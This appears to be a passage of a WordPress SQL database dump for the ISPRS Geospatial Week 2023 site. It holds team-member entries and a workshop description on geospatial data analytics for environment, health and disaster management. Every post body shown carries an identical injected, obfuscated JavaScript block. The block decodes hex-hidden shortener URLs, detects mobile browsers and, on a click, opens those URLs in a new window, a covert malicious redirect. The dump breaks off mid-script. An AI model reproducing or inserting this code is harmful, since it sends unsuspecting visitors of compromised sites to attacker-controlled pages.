,\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr Juan Ceusta','','publish','closed','closed','','dr-juan-ceusta','','','2023-01-14 01:56:35','2023-01-14 01:56:35','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3433',0,'dt_team','',0),
(3434,1,'2022-12-07 04:08:05','2022-12-07 04:08:05','<!-- wp:paragraph -->\n<p>ISPRS ICWG III/IVa on&nbsp;&nbsp; <strong>Disaster Management</strong></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr Saeid Pirasteh','','publish','closed','closed','','dr-saeid-pirasteh','','','2022-12-07 04:10:07','2022-12-07 04:10:07','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3434',0,'dt_team','',0),
(3435,1,'2022-12-07 04:09:15','2022-12-07 04:09:15','','w243','','inherit','open','closed','','w243','','','2022-12-07 04:09:15','2022-12-07 04:09:15','',3434,'https://gsw2023.com/wp-content/uploads/2022/12/w243.jpg',0,'attachment','image/jpeg',0),
(3436,1,'2022-12-07 04:09:40','2022-12-07 04:09:40','','w242','','inherit','open','closed','','w242','','','2022-12-07 04:09:40','2022-12-07 04:09:40','',3433,'https://gsw2023.com/wp-content/uploads/2022/12/w242.jpg',0,'attachment','image/jpeg',0),
(3437,1,'2022-12-07 04:11:13','2022-12-07 04:11:13','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5 style=\"text-align: justify;\" ><em> </em>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5 style=\"text-align: justify;\"><em> </em><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return 